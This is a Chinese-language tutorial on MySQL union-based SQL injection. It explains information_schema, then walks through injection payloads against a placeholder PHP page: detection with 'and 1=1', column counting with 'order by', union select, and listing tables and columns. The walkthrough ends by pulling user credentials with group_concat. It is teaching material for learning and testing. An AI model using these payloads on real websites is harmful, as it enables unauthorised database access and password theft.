SQL注入具体流程及相关知识

SQL注入扫盲

为了让每一个学习注入的人完整地了解SQL注入，此处以Mysql Union Query(联合查询)注入类型来讲解。了解Mysql注入前我们还必须先了解“information_schema”这个数据库。为了更直观地展示，以图形化界面PHPMyadmin来说明这个数据库。

information_schema数据数据库是MySQL自带的数据库，简单来说它存储着整个Mysql数据库的数据信息，其中就包含Mysql里面的所有库、表、字段的关系结构。

在PHPMysql中打开information_schema数据库中的SCHEMATA表。看最关键第二个字段“SCHEMA_NAME”，你是否会觉得很熟悉？

没错，它就是显示Mysql数据库中所有的库名。不信你可以在Mysql命令行使用Show databases;查看你数据库中的所有库子

这样来看的话，information_schema数据库的SCHEMATA表的SCHEMA_NAME字段保存的是所有的数据库的名：

-- 如果要显示某个数据库下的表，要先use 数据库名；还有一种方法用数据库.表名的方式：-- information_schema. SCHEMATA是什么意思呢？点号的前面是数据库名，点号后面则是表名，例如a.bc表示a数据库下的bc表select SCHEMA_NAME from information_schema.SCHEMATA; -- 效果等价于show databases>>>+--------------------+| SCHEMA_NAME|+--------------------+| information_schema || dvwa|| mysql  || performance_schema || pikachu|| pkxss  || test|+--------------------+7 rows in set (0.00 sec)

OK，那么我们来想想如何获取一个数据库中的所有表呢？没错，也是在information_schema数据库中。只不过我们不是看“SCHEMA_NAME”这个表了，而是看“TABLES”表了，这个表是存储着所有表及其属于哪个数据库这样一种关系的表，如下图（不完整的截图）：

注意看，第二个字段是数据库的名字，第三个字段“TABLE_NAME”则是表名；截图这一块内容是表示information_schema数据库下的所有表(截图未完全显示)，后面还有Mysql数据库下的所有表……

那么根据这一存储结构，要想获取一个数据库下的所有表的表名SQL语句：比如获取information_schema数据库下的所有表

-- select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='你要获取表的数据库名';select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='information_schema';>>>截取部分结果显示：+---------------------------------------+| TABLE_NAME|+---------------------------------------+| CHARACTER_SETS|| COLLATIONS|| COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS|| COLUMN_PRIVILEGES || ENGINES|| EVENTS|| FILES || GLOBAL_STATUS || GLOBAL_VARIABLES  || KEY_COLUMN_USAGE  |...

下一步我们要了解如何获取字段了，字段的信息存储在information_schema数据的COLUMNS表中。如下图中（截图不完整），第二个字段“TABLE_SCHEMA”是数据库名称，第三个字段“TABLE_NAME”是当前数据库中的表名。第四个字段“COLUMN_NAME”是当前表下的字段。部分截图如下：

同理要获取：information_schema数据库下的CHARACTER_SETS表的所有字段：

select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='CHARACTER_SETS';>>>+----------------------+| COLUMN_NAME  |+----------------------+| CHARACTER_SET_NAME|| DEFAULT_COLLATE_NAME || DESCRIPTION  || MAXLEN|+----------------------+4 rows in set (0.01 sec)

完成了上面的练习之后，笔者讲解UNION注入大家就会学的更明白了。首先如何判断注入点，大多数人所说的and 1=1、and 1=2来判断的确是可以的，但我们更需要明白每一个步骤的原理。

为什么会这样就可以判断呢？我们来使用Mysql数据库来查询试试。Select password from mysql.user where user=’root’ and 1=1；和 and 1=2 试试。如下图：

首先再来看下phpstudy下的mysql结果分布：COLUMN_NAME栏的数据就是mysql数据库的user表下面的所有字段名

部分截图：

select password from mysql.user where user='root' and 1=1;-- mysql.user的user是表名，where user的user是字段名，这里恰好重复缘故>>>+-------------------------------------------+| password  |+-------------------------------------------+| *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B || *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B || *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |+-------------------------------------------+3 rows in set (0.01 sec)-- and运算符，前后条件都成立才成立，右边1=1恒成立，所以写不写没区别，于是就按正常SQL输出结果select password from mysql.user where user='root' and 1=2;>>>Empty set (0.00 sec)-- 而1=2是不成立的，所以在这里就没有输出任何内容。这进一步说明WEB程序将我们输入的 and 1=1 带入了SQL查询语句中进行查询，通过返回页面的不同来判断。-- 这句话看下面的例子更直观：

http 😕/xxxx.com/huangou.php?id=5 and 1=1 返回和原来一样的页面;

http 😕/xxxx.com/huangou.php?id=5 and 1=2 返回空数据的页面

在URL的id=5后面加上 and 1=2，发现返回和and 1=1不一样的界面，说明WEB程序将我们输入的 and 1=1 带入了SQL查询语句中进行查询，由此得出，是可以注入的。

判断为SQL注入之后第二步是判断字段数，使用order by函数（用于查询出的结果排序的函数）。通过order by 1 、order by 2……order by 8，都是返回正常页面，如下图：id=5 order by 8;

当我们输入order by 9的时候，突然就返回空数据的页面了(与and 1=2页面一样)。如下图：

这时候初学者会有两个疑问：1、为什么会出现这样的情况？2、为什么要这样做？带着两个问题我们来解决，进入Mysql测试一下就会明白了（下图字段数不一样）:

select * from table order by n;-- n 表示select * 里面的第n个字段，整段sql的意义是：查询出来的结果，按照第n个字段排序select host,password from user order by 2; -- 这条语句password写在第二个，那么标号就是2，所以结果根据password排序;-- 该语句表示从user表取出的数据但只显示host、password两个字段，并且结果根据password排序;默认是升序select host,password from mysql.user where user='root' order by 2;>>>+-----------+-------------------------------------------+| host  | password  |+-----------+-------------------------------------------+| localhost | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B || 127.0.0.1 | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B || ::1| *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |+-----------+-------------------------------------------+3 rows in set (0.00 sec)-- 显然下面这条语句会报错select host,password from mysql.user where user='root' order by 3;>>>ERROR 1054 (42S22): Unknown column '3' in 'order clause'-- 因为select后面要显示的字段只有两个，按顺序排列1,2没有3这个字段名;

联合查询的注意事项：union两边的select语句的字段个数必须一致 ,同时select语句中的列的顺序要保持一致，根据上面已经判断出有注入，现在我们来猜测URL里的请求有多少个字段名？

使用union select 1,2,3,4,5,6,7,8 ，为啥到8为止，因为上面已经查询出来，9不能正常显示了；来查看这8个字段中哪几个字段位能在网页中正常显示的。截图如下：

从上图和上上图对比可以发现多了2、5、7三个数字，8个字段位的第2、5、7个字段能够在正常网页中显示了。有肯不是很理解，特地去验证了一下：

已知表product：

mysql> select product_id,sale_price from product;+------------+------------+| product_id | sale_price |+------------+------------+| 0001|1000 || 0002|500 || 0003|4000 || 0004|3000 || 0005|6800 || 0006|500 || 0007|880 || 0008|100 |+------------+------------+8 rows in set (0.00 sec)mysql> select product_id,sale_price from product union select 1,4;+------------+------------+| product_id | sale_price |+------------+------------+| 0001|1000 || 0002|500 || 0003|4000 || 0004|3000 || 0005|6800 || 0006|500 || 0007|880 || 0008|100 || 1  |  4 |+------------+------------+9 rows in set (0.00 sec)-- 前后对比，应该能稍微理解点，仅仅只有select 1,4会显示对应数字出来;

这时候你也许可以直接插入user()、database()、version()等Mysql的常量。补充个知识：

-- user()的功能是查看当前用户名，使用如下：mysql> select user();>>>+----------------+| user() |+----------------+| root@localhost |+----------------+1 row in set (0.00 sec)-- database()的功能是显示当前所使用的数据库名: NULL表示未选择任何数据库mysql> select database();+------------+| database() |+------------+| NULL|+------------+1 row in set (0.00 sec)-- version()显示版本；

但是我们这章要说如何获取数据。首先我们可以通过database()获取当前数据库；用这条语句union select 1,2,3,4,database(),6,7,8 ；截图如下：

获取了数据库名称之后，我们就需要查询表了，也就是查询数据库taogou123对应的表，这就要用到上面的information_schema.TABLES，MySQL数据库里的information_schema数据库的TABLES表里存储着

所有的表及其对应数据库之间的对应关系。还记得上节课说的如何从information_schema.TABLES。没错，如何构造呢？现在知道2、5、7可以显示数据，那就将我们要显示的数据放在这三个任意一个位置，我们现在要显示TABLES表中的TABLE_NAME字段，所以把它放在5上面去，那么后面还要规定从哪个数据表里面查的字句；

因此构造这样一条SQL语句：

xxx.com/huangou.php?id=5 union select 1,2,3,4,TABLE_NAME,6,7,8 from information_schema.TABLES  where TABLE_SCHEMA='taogou123' limit 1,1;-- 整个SQL语句的含义是从information_schema库中的TABLES表查询TABLE_NAME，条件是TABLE_SHCEMA=‘taogou123’，即查询taogou123数据库里的某个表-- 后面的limit 1,1是限制查询结果，比如查询出结果有100条，如果使用了limit 1,1则代表从第一条起，只显示一条。

结果显示：

下面开始有点不懂，？？？？

那是否如果要查询第二条则为：limit 2,1(从第二条开始只显示一条结果)，疑问来了？为什么我们只显示一条，而不是全部查询出来呢？很简单，是因为我们每个字段上面只能放一个数据，不能同时放多个数据，那么如何同时放多个数据呢？可以使用concat()、group_concat函数来，这两个函数我们可以简单认为是连接字符串，比如group_concat(user(),database(),version())就是把这三个常量的注入结果连接在一起，当做一个整体字符串显示在注入结果中。这里则将group_concat放在要查询的TABLE_NAME上。语句如下：

www.xxx.com/huangou.php?id=5 union select 1,2,3,4,group_concat(TABLE_NAME,0x3c2f62723e),6,7,8 from information_schema.TABLES where TABLE_SCHEMA='taogou123';-- 语句可以发现我们已经将limit去除了，但是问题是0x3c2f62723e是什么玩意？很简单，这是一个十六进制，转换为字符串则是：“</br>”，学过HTML的都知道吧，这是换行的意思。-- 如果我们不加上这个十六进制，打印的结果则是每个表连接在一起，可以从下图看效果:

如果没有换行符，就是横的一排。

这时候我们就要查询关键表了，可以从结果看出（当然这里被遮挡了）关键表是duoduo_user，接下来就是获取这个表的字段了，如果你不知道如何构造获取字段的SQL语句，那麻烦你看看上节提到的如何获取某个表中的字段。语句如下：

http://www.xxx.com/huangou.php?id=5 union select 1,2,3,4,group_concat(COLUMN_NAME,0x3c2f62723e),6,7,8 from information_schema.COLUMNS where TABLE_NAME='duoduo_user';

那么很简单了，我们知道如要要获取“dduseame”、“ddpassword”核心的用户密码的正常SQL语句是：select dduseame,ddpassword from duoduo_user; 当然这是在Mysql查询的时候这样写，如果代入我们的SQL语句中则必须用group_concat(dduseame, 0x3c2f62723e, ddpassword)包含起来。最后的SQL语句则为

http://www.xxxx.com/huangou.php?id=5 union select 1,2,3,4,group_concat(dduseame, 0x3c2f62723e,ddpassword),6,7,8 from duoduo_user;